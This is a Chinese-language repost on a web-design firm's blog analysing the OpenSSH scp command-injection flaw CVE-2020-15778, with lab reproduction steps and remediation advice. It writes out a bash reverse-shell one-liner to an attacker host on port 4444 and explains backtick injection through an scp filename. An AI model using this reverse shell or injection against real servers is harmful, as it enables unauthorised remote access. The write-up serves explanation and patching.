OpenSSH命令注入漏洞的示例分析

這篇文章主要介紹OpenSSH命令注入漏洞的示例分析,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

專注于為中小企業(yè)提供成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站建設(shè)服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)東洲免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了超過千家企業(yè)的穩(wěn)健成長(zhǎng),幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

漏洞說(shuō)明

漏洞編號(hào):CVE-2020-15778

SCP(secure copy)是一個(gè)在兩臺(tái)計(jì)算機(jī)之間拷貝文件的程序,使用ssh協(xié)議實(shí)現(xiàn)。默認(rèn)包含在大多數(shù)的linux和unix發(fā)行版中。該程序由openssh的scp.c及其他相關(guān)代碼實(shí)現(xiàn)。

出現(xiàn)漏洞的根本原因在于,scp.c文件的某個(gè)位置中,對(duì)遠(yuǎn)程命令參數(shù)沒有做好過濾,導(dǎo)致可遠(yuǎn)程執(zhí)行任意命令。詳細(xì)分析,往下看。

利用條件

1. 目標(biāo)服務(wù)器openssh版本<=openssh-8.3 p1

2. 目標(biāo)服務(wù)器scp可用

3. 目標(biāo)服務(wù)器ssh密碼已知

漏洞危害

可在目標(biāo)服務(wù)器上傳腳本,執(zhí)行任意命令,getshell。

利用場(chǎng)景

在已知ssh密碼,但禁止ssh遠(yuǎn)程登陸的情況下,可嘗試?yán)迷撀┒?,getshell。

漏洞分析

分析如下鏈接中,scp.c的第989行代碼:

https://github.com/openssh/openssh-portable/blob/a2855c048b3f4b17d8787bd3f24232ec0cd79abe/scp.c#L989

OpenSSH命令注入漏洞的示例分析

從以上代碼中可知,當(dāng)使用scp復(fù)制文件到遠(yuǎn)程服務(wù)器時(shí),在scp命令后面添加文件的路徑,命令如下:

scp SourceFile user@host:directory/TargetFile

在遠(yuǎn)程目標(biāo)服務(wù)器上,上述命令將會(huì)按照下面的形式本地執(zhí)行:

scp -t directory/TargetFile

在目標(biāo)服務(wù)器創(chuàng)建本地scp命令的同時(shí),并沒有過濾文件名。攻擊者可以使用反引號(hào)包裹payload然后加上文件名執(zhí)行scp命令。目標(biāo)服務(wù)器將會(huì)執(zhí)行反引號(hào)中的命令。

漏洞復(fù)現(xiàn)

攻擊機(jī) kali192.168.110.128
受害機(jī)centos192.168.110.130

在kali上創(chuàng)建一個(gè)名為kali.sh的文件,用來(lái)getshell。kali.sh文件內(nèi)容:

bash -i >& /dev/tcp/192.168.110.128/4444 0>&1

OpenSSH命令注入漏洞的示例分析

反彈shell命令解析如下:

命令 說(shuō)明
bash -i產(chǎn)生一個(gè)交互式bash
>& /dev/tcp/192.168.110.128/4444建立TCP連接,并將標(biāo)準(zhǔn)輸出和錯(cuò)誤重定向到TCP連接
0>&1從TCP連接獲取輸入

將kali.sh文件通過scp命令,遠(yuǎn)程傳輸?shù)絚entos中的指定目錄下:

OpenSSH命令注入漏洞的示例分析

在centos中可找到傳輸?shù)膋ali.sh文件:

OpenSSH命令注入漏洞的示例分析

在kali上監(jiān)聽4444端口:

OpenSSH命令注入漏洞的示例分析

執(zhí)行下面的poc,執(zhí)行上傳的反彈shell:

OpenSSH命令注入漏洞的示例分析

可觀察到,kali已經(jīng)成功連接到centos:

OpenSSH命令注入漏洞的示例分析

在linux中,反引號(hào)中的內(nèi)容將會(huì)被當(dāng)作shell命令執(zhí)行。要注意,這里poc中用的是反引號(hào),不是單引號(hào)。

漏洞修復(fù)

1. 更新openssh到最新版本

2. 禁用scp

3. 確保ssh密碼的安全性,防止被泄露或暴力破解

以上是“OpenSSH命令注入漏洞的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!

分享標(biāo)題:OpenSSH命令注入漏洞的示例分析
網(wǎng)站地址:http://muchs.cn/article10/ijoido.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供靜態(tài)網(wǎng)站、移動(dòng)網(wǎng)站建設(shè)、電子商務(wù)、標(biāo)簽優(yōu)化、搜索引擎優(yōu)化、外貿(mào)網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

成都定制網(wǎng)站網(wǎng)頁(yè)設(shè)計(jì)